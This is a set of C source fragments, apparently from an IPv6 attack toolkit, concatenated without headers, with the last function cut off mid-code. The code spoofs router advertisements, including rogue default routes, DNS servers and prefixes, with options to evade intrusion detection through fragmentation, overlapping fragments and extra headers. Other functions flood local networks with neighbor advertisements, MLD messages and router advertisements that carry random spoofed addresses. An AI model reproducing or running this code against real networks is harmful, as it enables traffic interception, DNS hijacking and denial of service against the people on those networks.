int main(int argc, char *argv[]) { char *interface, mac[16] = "", dmac[16] = ""; unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL; unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2"; unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1]; unsigned char *dst = thc_resolve6("ff02::1"); unsigned char *dstmac = thc_get_multicast_mac(dst); int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0; unsigned char *pkt = NULL, *searchlist = NULL; int pkt_len = 0; pcap_t *p; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); memset(rbuf, 0, sizeof(rbuf)); memset(mac, 0, sizeof(mac)); while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) { switch (i) { case 'i': interval = atoi(optarg); break; case 'm': sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]); dstmac = dmac; break; case 'S': sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); mac6 = mac; break; case 's': if ((ip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: can not resolve source ip address %s\n", optarg); exit(-1); } break; case 'M': mtu = atoi(optarg); if (mtu < 0 || mtu > 65535) { fprintf(stderr, "Error: mtu argument is invalid: %s\n", optarg); exit(-1); } if (mtu < 1228 || mtu > 1500) fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing: %d\n", mtu); break; case 'n': to_send = atoi(optarg); if (to_send < 1 || mtu > 255) { fprintf(stderr, "Error: -n argument is invalid, must be between 1 and 255: %s\n", optarg); exit(-1); } break; case 'A': if (pcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d autoconfig addresses\n", MAX_ENTRIES); exit(-1); } if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) { fprintf(stderr, "Error: -A option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg); exit(-1); } *ptr++ = 0; if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-) fprintf(stderr, "Error: -A option prefix length must be between 0 and 128: %s\n", optarg); exit(-1); } if (size != 64) fprintf(stderr, "Warning: -A option defines an unusual prefix length: %d\n", size); if (index(optarg, ':') == NULL) strcat(optarg, "::"); if ((routerip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: -A option network is invalid: %s\n", optarg); exit(-1); } pbuf[pcnt][0] = size % 256; memcpy((char *) &pbuf[pcnt][1], routerip6, 16); pcnt++; break; case 'a': plife = atoi(optarg); break; case 'r': rlife = atoi(optarg); break; case 'd': dlife = atoi(optarg); break; case 'l': llife = atoi(optarg); break; case 'T': reach = atoi(optarg); break; case 't': trans = atoi(optarg); break; case 'p': if (strncasecmp(optarg, "low", 3) == 0) prio = 0; else if (strncasecmp(optarg, "med", 3) == 0) prio = 1; else if (strncasecmp(optarg, "hi", 2) == 0) prio = 2; else if (strncasecmp(optarg, "res", 3) == 0) prio = 3; else { fprintf(stderr, "Error: unknown priority, known keywords are low, medium and high: %s\n", optarg); exit(-1); } break; case 'R': if (rcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d routes\n", MAX_ENTRIES); exit(-1); } if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) { fprintf(stderr, "Error: -R option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg); exit(-1); } *ptr++ = 0; if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-) fprintf(stderr, "Error: -R option prefix length must be between 0 and 128: %s\n", optarg); exit(-1); } if (index(optarg, ':') == NULL) strcat(optarg, "::"); if ((routerip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: -R option network is invalid: %s\n", optarg); exit(-1); } rbuf[rcnt][0] = size % 256; memcpy((char *) &rbuf[rcnt][1], routerip6, 16); rcnt++; break; case 'D': if (dcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d DNS servers\n", MAX_ENTRIES); exit(-1); } if ((dbuf[dcnt++] = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: can not resolve DNS server %s\n", optarg); exit(-1); } break; case 'L': searchlist = optarg; break; case 'E': if (optarg == NULL) { fprintf(stderr, "Error: no option type given for -E\n"); exit(-1); } for (j = 0; j < strlen(optarg); j++) { switch (optarg[j]) { // fall through to be fail safe on accidental misuse case '0': // fall through case 'O': do_overlap = 1; break; case 'o': do_overlap = 2; break; case '1': // fall through case 'l': // fall through case 'L': do_frag++; break; case 'h': // fall through case 'H': do_hop = 1; break; case 'd': // fall through case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: unknown evasion type %c!\n", optarg[j]); exit(-1); } if ((do_frag && (do_dst || do_overlap)) || (do_dst && do_overlap)) { fprintf(stderr, "Error: you can not use -E types 1, D, O and o together!\n"); exit(-1); } } break; case 'F': ptr = strtok(optarg, ","); while (ptr != NULL) { if (strncasecmp(ptr, "man", 3) == 0) flags = (flags | 128); else if (strncasecmp(ptr, "oth", 3) == 0) flags = (flags | 64); else if (strncasecmp(ptr, "hom", 3) == 0) flags = (flags | 32); else if (strncasecmp(ptr, "prox", 4) == 0) flags = (flags | 4); else if (strncasecmp(ptr, "res", 3) == 0) flags = (flags | 2); else if (strncasecmp(ptr, "unk", 3) == 0) flags = (flags | 1); else { fprintf(stderr, "Error: unknown flag: %s\n", ptr); exit(-1); } ptr = strtok(NULL, ","); } break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if ((argc - optind) < 1 || (argc - optind) > 2) help(argv[0]); if (do_hdr_size) myoff = do_hdr_size; interface = argv[optind]; if (argc - optind == 2) if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]); exit(-1); } if (mtu == 0) mtu = thc_get_mtu(interface); if (mac6 == NULL) if ((mac6 = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (ip6 == NULL) if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface); exit(-1); } // if (dns == NULL) // dns = thc_resolve6("ff02::fb"); frint = interface; frip6 = ip6; frmac = mac6; frbuf = buf; frbuf2 = buf2; frbuf2len = sizeof(buf2); memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if (llife > 0xffff) llife = 0xffff; llife = (llife | 0xff000000); if (prio == 2) llife = (llife | 0x00080000); else if (prio == 0) llife = (llife | 0x00180000); else if (prio != 1) llife = (llife | 0x00100000); llife = (llife | (flags << 16)); buf[0] = reach / 16777216; buf[1] = (reach % 16777216) / 65536; buf[2] = (reach % 65536) / 256; buf[3] = reach % 256; buf[4] = trans / 16777216; buf[5] = (trans % 16777216) / 65536; buf[6] = (trans % 65536) / 256; buf[7] = trans % 256; // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; i = 16; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, mac6, 6); i += 6; // option prefix, put all in if (pcnt > 0) for (j = 0; j < pcnt; j++) { buf[i++] = 3; buf[i++] = 4; buf[i++] = pbuf[j][0]; // prefix length buf[i++] = 128 + 64; buf[i++] = plife / 16777216; buf[i++] = (plife % 16777216) / 65536; buf[i++] = (plife % 65536) / 256; buf[i++] = plife % 256; buf[i++] = (plife / 2) / 16777216; buf[i++] = ((plife / 2) % 16777216) / 65536; buf[i++] = ((plife / 2) % 65536) / 256; buf[i++] = (plife / 2) % 256; i += 4; // + 4 bytes reserved memcpy(&buf[i], (char *) &pbuf[j][1], 16); i += 16; } // route option, put all in if (rcnt > 0) for (j = 0; j < rcnt; j++) { buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = rbuf[j][0]; // prefix length if (prio == 2) buf[i++] = 0x08; // priority, highest of course else if (prio == 1) buf[i++] = 0x00; else if (prio == 0) buf[i++] = 0x18; else buf[i++] == 0x10; buf[i++] = rlife / 16777216; buf[i++] = (rlife % 16777216) / 65536; buf[i++] = (rlife % 65536) / 256; buf[i++] = rlife % 256; memcpy((char *) &buf[i], (char *) &rbuf[j][1], 16); // network i += 16; } // dns option if (dcnt > 0) for (j = 0; j < dcnt; j++) { buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // reserved buf[i++] = dlife / 16777216; buf[i++] = (dlife % 16777216) / 65536; buf[i++] = (dlife % 65536) / 256; buf[i++] = dlife % 256; memcpy(buf + i, dbuf[j], 16); // dns server i += 16; } // dns searchlist option if (searchlist != NULL) { buf[i] = 31; buf[i + 4] = dlife / 16777216; buf[i + 5] = (dlife % 16777216) / 65536; buf[i + 6] = (dlife % 65536) / 256; buf[i + 7] = dlife % 256; if (searchlist[strlen(searchlist) - 1] == '.') searchlist[strlen(searchlist) - 1] = 0; m = 0; while ((ptr = strstr(searchlist, ".,")) != NULL) { m = strlen(ptr); for (l = 1; l < m; l++) ptr[l - 1] = ptr[l]; ptr[m - 1] = 0; } l = 0; m = 0; j = strlen(searchlist); do { k = 0; ptr = index(&searchlist[l], '.'); if (ptr == NULL || (index(&searchlist[l], ',') != NULL && (char*)ptr > (char*)index(&searchlist[l], ','))) { k = 1; ptr = index(&searchlist[l], ','); } if (ptr != NULL) *ptr = 0; n = strlen(&searchlist[l]); buf[i + 8 + m] = n; memcpy(&buf[i + 8 + m + 1], &searchlist[l], n); if (ptr == NULL) l = j; else l += 1 + n; m += 1 + n; if (k || ptr == NULL) m++; // end of domain entry } while (l < j && ptr != NULL); if (m % 8 > 0) m = ( (m / 8) + 1 ) * 8; buf[i + 1] = m/8 + 1; i += m + 8; } frbuflen = i; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0) return -1; } if (do_frag) { type = NXT_FRAG; for (j = 0; i < do_frag; j++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, llife, buf, i, 0) < 0) return -1; if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) return -1; frhdr = (thc_ipv6_hdr *) pkt; //printf("DEBUG: RA size is %d bytes, do_dst %d, do_overlap %d\n", i + 8, do_dst, do_overlap); // init pcap if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } printf("Starting to advertise router (Press Control-C to end) ...\n"); while (sent < to_send || to_send > 255) { if (do_dst) { thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232); } else if (do_overlap) { if (do_overlap == 1) thc_send_as_overlapping_first_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0); else thc_send_as_overlapping_last_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0); } else { thc_send_pkt(interface, pkt, &pkt_len); } while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0); sent++; if (sent != to_send || to_send > 255) sleep(interval); } return 0; // never reached }
int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6; unsigned char buf[24], srcmac[8] = "", *smac = NULL; unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst); int i; unsigned char *pkt = NULL; int pkt_len = 0, flags, rawmode = 0, count = 0, prefer = PREFER_LINK, keepmac = 0; if (argc > 2 && strncmp(argv[1], "-k", 2) == 0) { keepmac = 1; if ((smac = thc_get_own_mac(argv[2])) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", argv[2]); exit(-1); } argv++; argc--; } if (argc > 2 && strncmp(argv[1], "-m", 2) == 0) { sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]); smac = srcmac; argv+=2; argc-=2; } if (smac != NULL) mac6 = smac; if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc == 3) { if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: invalid target IPv6 address\n"); exit(-1); } else { dstmac = thc_get_mac(interface, NULL, dst); } if (dst[0] >= 0x20 && dst[0] <= 0xfd) prefer = PREFER_GLOBAL; } ip6 = thc_get_own_ipv6(interface, dst, prefer); mac[0] = 0x00; mac[1] = 0x18; memset(ip6 + 8, 0, 8); ip6[8] = 0x02; ip6[9] = mac[1]; ip6[11] = 0xff; ip6[12] = 0xfe; memset(buf, 0, sizeof(buf)); buf[16] = 2; buf[17] = 1; buf[18] = mac[0]; buf[19] = mac[1]; memcpy(buf, ip6, 16); flags = ICMP6_NEIGHBORADV_OVERRIDE; printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 2; i < 6; i++) mac[i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; count++; memcpy(buf + 10, ip6 + 10, 6); memcpy(&buf[20], mac + 2, 4); if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; }
int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0"); unsigned char buf[6]; unsigned char *dst = thc_resolve6("ff02::6a"), *dstmac = thc_get_multicast_mac(dst); int i; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; int count = 0; if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc > 2) if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: can not resolve %s\n", argv[2]); exit(-1); } memset(buf, 0, sizeof(buf)); mac[0] = 0x00; mac[1] = 0x18; ip6[9] = mac[1]; printf("Starting to flood network with MLD router advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 0; i < 4; i++) mac[2 + i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD_ROUTERADV, 15, 0x00300006, buf, 0, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; }
int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *routerip6, *route6, *mac6 = mac, *ip6; unsigned char buf[56], buf2[6], buf3[1504]; unsigned char *dst = thc_resolve6("FF02::1"), *dstmac = thc_get_multicast_mac(dst); int size, mtu, i, type = NXT_ICMP6; unsigned char *pkt = NULL; int pkt_len = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, cnt, do_dst = 0; thc_ipv6_hdr *hdr = NULL; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "DFHr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[optind]; mtu = 1500; size = 64; ip6 = malloc(16); routerip6 = malloc(16); route6 = malloc(16); mac[0] = 0x00; mac[1] = 0x18; memset(ip6, 0, 16); ip6[0] = 0xfe; ip6[1] = 0x80; ip6[8] = 0x02; ip6[9] = mac[1]; ip6[11] = 0xff; ip6[12] = 0xfe; routerip6[0] = 0x2a; routerip6[1] = 0x01; routerip6[15] = 0x01; memset(route6 + 8, 0, 8); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); memset(buf, 0, sizeof(buf)); buf[1] = 250; buf[5] = 30; buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; buf[16] = 3; buf[17] = 4; buf[18] = size; buf[19] = 128 + 64 + 32; memset(&buf[20], 255, 8); buf[48] = 1; buf[49] = 1; printf("Starting to flood network with router advertisements on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface); while (1) { for (i = 2; i < 6; i++) mac[i] = rand() % 256; for (i = 2; i < 8; i++) routerip6[i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; memcpy(route6, routerip6, 8); memcpy(&buf[32], route6, 16); memcpy(&buf[50], mac6, 6); count++; if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i < do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff08ffff, buf, sizeof(buf), 0) < 0) return -1; if (do_dst) { thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, ip6, dst, type, hdr->pkt + 40 + 14, hdr->pkt_len - 40 - 14, 1240); } else { if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); perror(""); return -1; } } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 100 == 0) printf("."); } return 0; }
int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0"); unsigned char buf[6], buf2[RECORD_NUMBER * (4 + 16 + 16)]; unsigned char *dst = thc_resolve6("ff02::16"), *dstmac = thc_get_multicast_mac(dst); int i, j; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; int count = 0; if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; mac[0] = 0x00; mac[1] = 0x18; ip6[9] = mac[1]; memset(buf, 0, sizeof(buf)); buf[0] = 5; buf[1] = 2; memset(buf2, 0, sizeof(buf2)); for (i = 0; i < RECORD_NUMBER; i++) { buf2[0 + i * 36] = 3; // CHANGE_TO_INCLUDE_MODE buf2[3 + i * 36] = 1; buf2[4 + i * 36] = 0xff; buf2[5 + i * 36] = 0x02; memcpy(buf2 + 20 + i * 36, ip6, 16); } printf("Starting to flood network with MLDv2 reports on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface); while (1) { for (i = 0; i < 4; i++) mac[2 + i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; for (i = 0; i < RECORD_NUMBER; i++) { for (j = 0; j < 6; j++) buf2[14 + j + i * 36] = rand() % 256; memcpy(buf2 + 29 + i * 36, ip6 + 9, 7); } count++; if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD2_REPORT, 0, RECORD_NUMBER, buf2, sizeof(buf2), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 100 == 0) printf("."); } return 0; }
int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6; unsigned char buf[24]; unsigned char *dst = thc_resolve6("FF02::1"), *dstmac = thc_get_multicast_mac(dst); int i; unsigned char *pkt = NULL; int pkt_len = 0, flags, rawmode = 0, count = 0; if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; ip6 = malloc(16); mac[0] = 0x00; mac[1] = 0x18; memset(ip6, 0, 16); ip6[0] = 0xfe; ip6[1] = 0x80; ip6[8] = 0x02; ip6[9] = mac[1]; ip6[11] = 0xff; ip6[12] = 0xfe; memset(buf, 0, sizeof(buf)); buf[16] = 2; buf[17] = 1; buf[18] = mac[0]; buf[19] = mac[1]; memcpy(buf, ip6, 16); printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface); while (1) { for (i = 2; i < 6; i++) mac[i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; count++; memcpy(buf + 10, ip6 + 10, 6); memcpy(&buf[20], mac + 2, 4); flags = ICMP6_NEIGHBORADV_OVERRIDE; if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); perror(""); return -1; } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 100 == 0) printf("."); } return 0; }
int main(int argc, char *argv[]) { char *routerip, *interface, mac[16] = ""; unsigned char *routerip6, *route6, *mac6 = mac, *ip6; unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2"; unsigned char *dst = thc_resolve6("ff02::1"); unsigned char *dstmac = thc_get_multicast_mac(dst); unsigned char *dns; int size, mtu = 1500, i, j, k, cnt; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; pcap_t *p; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "FHDr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); if (do_hdr_size) myoff = do_hdr_size; frbuf = buf; frbuf2 = buf2; frbuf2len = sizeof(buf2); memset(mac, 0, sizeof(mac)); interface = argv[optind]; mtu = thc_get_mtu(interface); if (argc - optind >= 5) mtu = atoi(argv[optind + 4]); if (argc - optind >= 7 && (ptr = argv[optind + 5]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); if (argc - optind >= 4 && argv[optind + 3] != NULL) ip6 = thc_resolve6(argv[optind + 3]); else ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); frip6 = ip6; frint = interface; frmac = mac6; if (argc - optind >= 4 && argv[optind + 2] != NULL) dns = thc_resolve6(argv[optind + 2]); else dns = thc_resolve6("ff02::fb"); routerip = argv[optind + 1]; if (routerip == NULL || (ptr = index(routerip, '/')) == NULL) { printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n"); exit(-1); } *ptr++ = 0; size = atoi(ptr); routerip6 = thc_resolve6(routerip); route6 = thc_resolve6(routerip); if (routerip6 == NULL || size < 1 || size > 128) { fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[optind + 1]); exit(-1); } if (size < 48 || size > 64) fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size); if (dns == NULL) { fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[optind + 2]); exit(-1); } if (ip6 == NULL) { fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[optind + 3]); exit(-1); } if (mtu < 1 || mtu > 65536) { fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[optind + 4]); exit(-1); } if (mtu < 1228 || mtu > 1500) fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu); if (mac6 == NULL) { fprintf(stderr, "Error: mac address in invalid\n"); exit(-1); } memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } i = 128 - size; j = i / 8; k = i % 8; if (k > 0) j++; memset(route6 + 16 - j, 0, j); if (k > 0) route6[17 - j] = (route6[17 - j] >> (8 - k)) << (8 - k); // buf[3] = 250; // 0-3: reachable timer buf[6] = 4; // 4-7: retrans timer // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; // option prefix buf[16] = 3; buf[17] = 4; buf[18] = size; // prefix length buf[19] = 128 + 64; memset(&buf[20], 17, 4); memset(&buf[24], 4, 4); memcpy(&buf[32], route6, 16); i = 48; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, mac6, 6); i += 6; // default route routing option buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x00; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word i += 16; // 56-71 address, all zeros for default // specific route routing option 2000::/3 buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x03; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word buf[i++] = 0x20; // 56-71 address: 2000:: i += 15; // specific route routing option 2000::/3 buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x07; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word 